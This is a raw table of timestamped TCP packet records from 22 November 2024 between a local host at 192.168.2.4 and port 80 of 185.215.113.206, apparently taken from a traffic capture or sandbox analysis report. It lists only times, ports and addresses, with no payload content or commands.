Nov 22, 2024 20:35:23.526957989 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.527004957 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.527817011 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.527862072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.527899027 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.527941942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.528732061 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.528786898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.528846979 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.528944969 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.529795885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.529854059 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.529966116 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.530016899 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.530661106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.530705929 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.530810118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.530888081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.531599998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.531651974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.531759977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.531800985 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.532702923 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.532756090 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.532847881 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.532886982 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.533943892 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.533998013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.534009933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.534050941 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.534563065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.534609079 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.534655094 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.534698009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.535366058 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.535412073 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.569226980 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.569381952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.569433928 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.569614887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.569657087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.569732904 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.569772959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.570658922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.570779085 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.570822001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.571508884 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.571546078 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.634906054 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.634983063 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.635075092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.635309935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.635350943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.635432959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.635463953 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.636281967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.636324883 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.636400938 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.636432886 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.637264013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.637314081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.637574911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.637613058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.637676954 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.637711048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.638494015 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.638600111 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.638648987 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.639503002 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.639565945 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.639602900 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.639637947 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.640427113 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.640903950 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.686851025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.686924934 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.686956882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.686995029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.687319994 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.687340021 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.687380075 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.688219070 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.688271046 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.688294888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.688327074 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.689177036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.689229965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.689290047 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.689623117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.690208912 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.690253973 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.690284967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.690337896 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.691112995 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.691210985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.691216946 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.691241026 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.692106009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.692260981 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.692308903 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.693133116 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.693188906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.693224907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.693263054 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.693964005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.694009066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.694071054 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.694111109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.694922924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.694967031 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.695045948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.695085049 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.696034908 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.696077108 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.696264982 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.696306944 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.696831942 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.696875095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.696913004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.696953058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.697750092 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.697796106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.697844982 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.697885036 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.698723078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.698824883 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.698868036 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.699609041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.699656963 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.699724913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.699765921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.700608969 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.700659990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.700699091 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.700735092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.701535940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.701581001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.701637983 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.701677084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.702459097 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.702600002 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.702641010 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.703394890 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.703437090 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.703663111 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.703707933 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.704399109 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.704438925 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.704473972 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.704505920 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.705255985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.705311060 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.705334902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.705367088 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.706235886 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.706254005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.706301928 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.707148075 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.707190990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.707247019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.707282066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.708076954 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.708127975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.708209991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.708247900 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.709110975 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.709172964 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.709249020 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.709292889 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.710033894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.710076094 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.710124969 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.710935116 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.710978031 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.711020947 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.711052895 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.711849928 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.711895943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.711944103 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.711985111 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.712804079 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.712846994 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.712953091 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.712990999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.713848114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.713891983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.713948965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.713988066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.714677095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.714772940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.714814901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.715951920 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.715996981 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.716165066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.716223001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.716892958 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.716936111 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.716969967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.717010021 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.717540026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.717601061 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.717622042 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.717641115 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.718430042 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.718480110 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.718544006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.818279028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.942133904 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.268755913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.268784046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.268882990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.268919945 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.268920898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.268995047 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.269036055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.269773960 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.269817114 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.269881010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.269922018 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.270710945 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.270764112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.270849943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.270891905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.271648884 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.271697998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.271780014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.271826029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.272572041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.272636890 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.272697926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.272744894 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.273551941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.273600101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.273633957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.273674965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.274444103 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.274490118 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.274554014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.274596930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.275391102 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.275433064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.275491953 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.275523901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.276357889 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.276401997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.276406050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.276434898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.277308941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.277357101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.277439117 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.277472973 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.278214931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.278259039 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.278321028 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.278357983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.279169083 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.279211998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.279263973 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.279320002 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.280086040 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.280123949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.280196905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.280230999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.281039953 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.281083107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.281224012 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.281264067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.281979084 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.282020092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.282084942 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.282129049 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.282933950 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.282979965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.283041000 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.283094883 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.283838987 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.283883095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.283956051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.283996105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.284782887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.284826040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.284895897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.284934044 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.285773993 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.285794973 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.285815001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.285844088 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.286669016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.286712885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.286772966 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.286804914 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.287791967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.287822962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.287839890 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.287853003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.288552046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.288594961 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.288647890 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.288681030 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.289494038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.289554119 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.289602995 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.289639950 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.290452003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.290492058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.290535927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.290575027 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.291343927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.291384935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.401650906 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.401668072 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.401721001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.401771069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.401793003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.401834011 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.402653933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.402699947 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.402755976 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.402796030 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.403584957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.403626919 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.403774023 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.403814077 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.404516935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.404644012 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.404725075 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.405464888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.405510902 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.405571938 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.405615091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.406409979 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.406455040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.406507015 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.406546116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.407402039 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.407444954 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.407458067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.407479048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.408284903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.408328056 CET	49750	80	192.168.2.4	185.215.113.206
